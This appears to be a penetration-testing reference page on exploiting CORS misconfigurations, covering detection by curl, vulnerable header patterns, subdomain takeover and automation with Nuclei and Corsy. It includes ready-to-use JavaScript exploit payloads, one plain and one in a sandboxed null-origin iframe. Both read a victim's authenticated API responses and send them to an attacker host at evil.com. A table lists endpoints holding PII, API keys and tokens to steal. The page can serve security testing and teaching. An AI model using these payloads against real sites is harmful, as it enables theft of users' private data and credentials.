> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# CORS Misconfiguration

> CORS misconfiguration exploitation: origin reflection, null origin, wildcard abuse, and credential theft.

## Overview

Cross-Origin Resource Sharing (CORS) controls which origins can access resources. Misconfigured CORS headers allow attacker's site to read responses from victim's authenticated session.

***

## Key Headers

| Header                             | Description            |
| ---------------------------------- | ---------------------- |
| `Access-Control-Allow-Origin`      | Allowed origin         |
| `Access-Control-Allow-Credentials` | Allow cookies/auth     |
| `Access-Control-Allow-Methods`     | Allowed HTTP methods   |
| `Access-Control-Allow-Headers`     | Allowed headers        |
| `Access-Control-Expose-Headers`    | Headers readable by JS |
| `Access-Control-Max-Age`           | Preflight cache time   |

***

## Detection

### Check Headers

```bash theme={"dark"}
curl -s -I -H "Origin: https://evil.com" https://TARGET/api/user
```

Look for:

```
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
```

If your origin is reflected back with credentials → exploitable.

### Variations to Test

```bash theme={"dark"}
# Reflected origin
curl -s -I -H "Origin: https://evil.com" TARGET

# Null origin
curl -s -I -H "Origin: null" TARGET

# Subdomain
curl -s -I -H "Origin: https://sub.TARGET" TARGET

# Prefixed domain
curl -s -I -H "Origin: https://TARGETevil.com" TARGET

# Suffixed domain
curl -s -I -H "Origin: https://evil-TARGET" TARGET
```

***

## Vulnerable Configurations

### 1. Origin Reflection

Server reflects any `Origin` header back.

```
Request:  Origin: https://evil.com
Response: Access-Control-Allow-Origin: https://evil.com
          Access-Control-Allow-Credentials: true
```

### 2. Null Origin Allowed

```
Request:  Origin: null
Response: Access-Control-Allow-Origin: null
          Access-Control-Allow-Credentials: true
```

Triggered from sandboxed iframes, data URIs, local files.

### 3. Weak Regex

Server checks if origin contains target domain:

```
evil.com.TARGET.com     → Allowed (prefix match)
TARGET.evil.com         → Allowed (contains target)
TARGETevil.com          → Allowed (substring match)
```

### 4. Wildcard with Credentials

```
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
```

Browsers block this combo, but some frameworks handle it incorrectly.

### 5. Pre-Domain Wildcard

```
*.TARGET.com → Any subdomain allowed
```

If attacker has XSS on any subdomain → can exploit CORS.

***

## Exploitation — Origin Reflection

```html theme={"dark"}
<script>
var req = new XMLHttpRequest();
req.onload = function() {
    // Send victim's data to attacker
    fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
};
req.open('GET', 'https://TARGET/api/user', true);
req.withCredentials = true;
req.send();
</script>
```

Host on `https://evil.com` → victim visits → their authenticated data sent to attacker.

***

## Exploitation — Null Origin

```html theme={"dark"}
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
  src="data:text/html,<script>
    var req = new XMLHttpRequest();
    req.onload = function() {
      fetch('https://evil.com/steal?data=' + encodeURIComponent(this.responseText));
    };
    req.open('GET', 'https://TARGET/api/user', true);
    req.withCredentials = true;
    req.send();
  </script>">
</iframe>
```

Sandboxed iframe sends `Origin: null`.

***

## Exploitation — Subdomain Takeover + CORS

If `*.TARGET.com` is allowed and an unused subdomain exists:

1. Take over `unused.TARGET.com` (dangling CNAME, cloud service)
2. Host exploit on `unused.TARGET.com`
3. CORS allows it → read authenticated responses

***

## Data to Steal

| Endpoint        | Data                      |
| --------------- | ------------------------- |
| `/api/user`     | PII, email, role          |
| `/api/account`  | Account details, API keys |
| `/api/settings` | Config, tokens            |
| `/api/admin`    | Admin data                |
| `/api/keys`     | API keys, secrets         |

***

## Automation

### Nuclei

```bash theme={"dark"}
nuclei -t http/vulnerabilities/cors/ -l urls.txt
```

### Manual Script

```bash theme={"dark"}
while read url; do
    origin=$(curl -s -I -H "Origin: https://evil.com" "$url" | grep -i "access-control-allow-origin")
    creds=$(curl -s -I -H "Origin: https://evil.com" "$url" | grep -i "access-control-allow-credentials")
    if [[ "$origin" == *"evil.com"* ]] && [[ "$creds" == *"true"* ]]; then
        echo "[VULN] $url"
    fi
done < urls.txt
```

### Corsy

```bash theme={"dark"}
# https://github.com/s0md3v/Corsy
python3 corsy.py -u https://TARGET
python3 corsy.py -i urls.txt -t 20
```

***

## Impact Matrix

| Config             | Credentials | Impact                                |
| ------------------ | ----------- | ------------------------------------- |
| Reflected origin   | true        | Critical — full data theft            |
| Null allowed       | true        | High — iframe exploitation            |
| Weak regex         | true        | High — register lookalike domain      |
| Wildcard `*`       | false       | Low — no auth data accessible         |
| Subdomain wildcard | true        | Medium — needs subdomain XSS/takeover |

***

## Quick Reference

| Test             | Command                                               |
| ---------------- | ----------------------------------------------------- |
| Check reflection | `curl -I -H "Origin: https://evil.com" TARGET`        |
| Check null       | `curl -I -H "Origin: null" TARGET`                    |
| Exploit          | Host JS that reads `/api/user` with `withCredentials` |
| Tool             | `corsy.py -u TARGET`                                  |

***

## Sources

* [PortSwigger — CORS](https://portswigger.net/web-security/cors)
* [MDN — Cross-Origin Resource Sharing](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)
* [OWASP — Testing for CORS](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing)
